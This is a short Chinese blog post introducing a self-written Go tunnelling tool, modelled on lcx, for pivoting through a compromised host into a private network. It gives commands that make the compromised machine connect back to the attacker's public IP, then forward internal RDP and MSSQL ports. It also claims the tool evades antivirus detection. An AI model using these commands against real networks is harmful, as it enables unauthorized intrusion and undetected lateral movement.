内网打洞,类似于lcx 但是比他更加强大

2019-07-13 07:58发布


       经常有朋友用lcx的,但是由于很多原因可能都不好使,例如 : 1.linux下能用lcx,有时只能拿msf出来。(golang的程序跨平台,甚至嵌入式linux都支持。) 2.不免杀  (基本上目前golang 语言不会被当病毒) 3.每次内网要从新连接其他主机时候,必须从进去从新敲打命令 ,操作过多任意被发现。(肉鸡只用操作一次,其他都交给主控端操作了)
最近正好都碰上了,于是自己写了一个。 运行如下:

现借下列场景展开介绍:

介绍: 以上IP拓扑如上,内网私有,外网无法直接访问内网任意主机,其中A已经控制了B。
目的: 攻击者A想通过B 连接内部任意计算机(如远程桌面,数据库)
要求: 攻击者A 已经控制B,并远程桌面内部其他机器C和其他机器。
操作: 首先, 在B上面敲打:      lcx 111.13.100.92 123
其次剩下的都在A上敲打:  假如 A 想连接内网 C 的远程桌面,在A上敲:lcx 456 123 192.168.10.3 3389      这时候 A 只用连接本机的456端口就等于连接内网的3389了。
假如A 想还想连接内网其他机器的mssql (假设IP地址为192.168.10.55):   这时候B不用管,只用在A上敲:lcx 1433 123 192.168.10.55 1433


暂时提供windows版本下载: http://download.csdn.net/detail/yatere/8642431